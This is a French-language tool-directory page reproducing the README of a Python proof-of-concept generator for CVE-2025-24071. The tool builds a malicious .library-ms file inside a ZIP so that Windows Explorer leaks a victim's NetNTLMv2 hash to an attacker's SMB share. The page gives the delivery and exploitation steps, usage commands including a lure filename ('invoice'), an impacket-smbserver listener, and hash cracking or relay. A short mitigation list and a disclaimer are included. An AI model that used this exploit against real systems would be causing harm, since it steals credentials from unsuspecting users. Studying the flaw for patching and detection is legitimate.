Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24071 — Générateur de PoC Python sans dépendances pour CVE-2025-24071 qui crée un fichier .library-ms malveillant dans un ZIP pour déclencher la divulgation du hash NTLM de Windows Explorer. | Kitploit
Outils/GitHubGitHub/bardlaudian/cve-2025-24071
Outils de PhishingAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationMouvement LatéralCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubbardlaudian/cve-2025-24071

CVE-2025-24071

Générateur de PoC Python sans dépendances pour CVE-2025-24071 qui crée un fichier .library-ms malveillant dans un ZIP pour déclencher la divulgation du hash NTLM de Windows Explorer.

Voir le dépôt
1il y a 2 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24071 — Usurpation d'identité dans l'Explorateur de fichiers Windows / Divulgation du hash NTLM via .library-ms

Python CVE Platform

⚠️ Avertissement : Cet outil est destiné à des fins éducatives et à des tests d'intrusion autorisés uniquement. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test. Toute utilisation non autorisée est illégale.


Table des matières

  • Présentation
  • Détails de la vulnérabilité
  • Fonctionnement
  • Prérequis
  • Installation
  • Utilisation
  • Exemples
  • Mesures d'atténuation
  • Crédits
  • Références

Présentation

L'Explorateur de fichiers Windows analyse automatiquement certains types de fichiers dès qu'ils apparaissent dans une vue de dossier, sans aucune interaction de l'utilisateur telle qu'un double-clic. Les versions affectées ne parviennent pas à valider correctement les fichiers .library-ms, qui peuvent définir un connecteur de recherche pointant vers un chemin SMB distant arbitraire.

Lorsque l'Explorateur affiche un dossier contenant un fichier .library-ms malveillant (par exemple juste après l'extraction d'une archive ZIP/RAR), il tente silencieusement de se connecter au chemin UNC contrôlé par l'attaquant pour résoudre l'emplacement de la « bibliothèque ». Cette tentative de connexion SMB transporte le hash NetNTLMv2 de la victime, qu'un attaquant capturant le trafic sur l'hôte spécifié (par exemple avec impacket-smbserver ou Responder) peut ensuite tenter de casser hors ligne ou de relayer.

Ce dépôt contient une réécriture minimale et sans dépendances d'un générateur de PoC public pour cette vulnérabilité : il construit le fichier .library-ms malveillant et l'empaquette dans un ZIP, en utilisant uniquement la bibliothèque standard de Python.


Détails de la vulnérabilité


Fonctionnement

Un fichier .library-ms est un document XML qui indique à l'Explorateur Windows d'afficher le contenu d'un emplacement distant ou local en tant que « bibliothèque ». Son élément <simpleLocation><url> peut pointer vers un chemin UNC (\\<host>\<share>).

Dans les versions affectées, l'Explorateur résout cet emplacement dès que le dossier est affiché — aucun double-clic ni action explicite n'est requis au-delà du fait que le fichier soit visible dans une vue de dossier (par exemple, juste après l'extraction d'une archive qui le contient).

Conditions d'attaque

  1. L'attaquant contrôle un hôte joignable par la victime (ou se trouve sur le même réseau) exécutant un écouteur SMB (impacket-smbserver, Responder, etc.).
  2. Un fichier .library-ms malveillant est généré, pointant vers \\<attacker_ip>\<share>.
  3. Le fichier est livré à la victime, généralement empaqueté dans une archive ZIP/RAR (ce dépôt automatise cette étape d'empaquetage).
  4. La victime extrait l'archive et affiche le dossier dans l'Explorateur — aucune interaction supplémentaire n'est nécessaire.

Déroulement de l'exploitation

root@kitploit:~
1. Start an SMB listener on the attacker machine
2. Generate a .library-ms file pointing to \\<attacker_ip>\<share>
3. Package it into a ZIP archive
4. Deliver the ZIP to the victim (upload feature, email, share, etc.)
5. Victim extracts the ZIP and Explorer renders the folder
6. Explorer resolves the UNC path -> SMB auth attempt -> NetNTLMv2 hash captured
7. Crack the hash offline (hashcat -m 5600) or relay it

Prérequis

  • Python 3.8+ (bibliothèque standard uniquement — os, sys, argparse, zipfile)

Aucune dépendance tierce n'est nécessaire pour générer la charge utile. La capture du hash nécessite un écouteur SMB tel qu'Impacket (impacket-smbserver) ou Responder côté attaquant.


Installation

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2025-24071.git
cd CVE-2025-24071

Utilisation

root@kitploit:~
usage: cve_2025_24071.py [-h] [-n NAME] [-i IP] [-s SHARE] [-o OUTDIR] [-a]

options:
  -n NAME, --name NAME             Output base filename (no extension)
  -i IP, --ip IP                   Attacker IP to embed as the UNC path target
  -s SHARE, --share SHARE          Share name (default: shared)
  -o OUTDIR, --outdir OUTDIR       Output directory (default: current dir)
  -a, --affected-versions          Print the list of affected Windows versions and exit

Exemples

Utilisation de base

root@kitploit:~
python3 cve_2025_24071.py -n invoice -i 10.10.14.5

Cela produit invoice.zip, contenant invoice.library-ms pointant vers \\10.10.14.5\shared.

Démarrer l'écouteur avant de livrer le fichier

root@kitploit:~
impacket-smbserver shared /tmp/smbshare -smb2support

Nom de partage et répertoire de sortie personnalisés

root@kitploit:~
python3 cve_2025_24071.py -n report -i 10.10.14.5 -s data -o ./payloads

Lister les versions affectées

root@kitploit:~
python3 cve_2025_24071.py -a

Mesures d'atténuation

  • Appliquez la mise à jour de sécurité cumulative de mars 2025 (ou ultérieure) pour votre version de Windows.
  • Restreignez le SMB sortant (TCP 445) au périmètre réseau pour empêcher la fuite des hashes NTLM vers des hôtes externes.
  • Imposez la signature SMB et désactivez NTLM lorsque c'est possible au profit de Kerberos.
  • Analysez les archives téléversées/extraites à la recherche de fichiers .library-ms et de types de fichiers similaires analysés automatiquement avant qu'ils n'atteignent les postes de travail des utilisateurs finaux.

Crédits

  • Vulnérabilité découverte et signalée à Microsoft par : Microsoft (créditée via le MSRC ; le rapporteur externe original n'était pas divulgué publiquement au moment de la rédaction)
  • Avis publié par : Microsoft Security Response Center (MSRC)
  • Concept du générateur de PoC public référencé depuis : ThemeHackers
  • Réécriture avec la bibliothèque standard : Bardlaudian — version sans dépendances du générateur ZIP/.library-ms, aucune nouvelle technique d'exploitation

Références

  • MSRC — Guide de mise à jour de sécurité CVE-2025-24071
  • NVD — CVE-2025-24071
  • Enregistrement CVE.org — CVE-2025-24071
  • GitHub Advisory Database — GHSA-mppc-8qxh-4wjw
Télécharger l’outil
ChampValeur
CVECVE-2025-24071
AffectésWindows 10 (1607–22H2), Windows 11 (22H2–24H2), Windows Server 2012 R2 – 2025
TypeExposition d'informations sensibles à un acteur non autorisé (CWE-200)
PrivilègesAucun (attaquant non authentifié ; nécessite que la victime visualise/extrait le fichier)
ImpactDivulgation du hash NetNTLMv2 → cassage hors ligne ou relais NTLM
CVSS7.5 Élevé (selon la GitHub Advisory Database) / 6.5 (base MSRC)
CorrectifMises à jour cumulatives du Patch Tuesday de mars 2025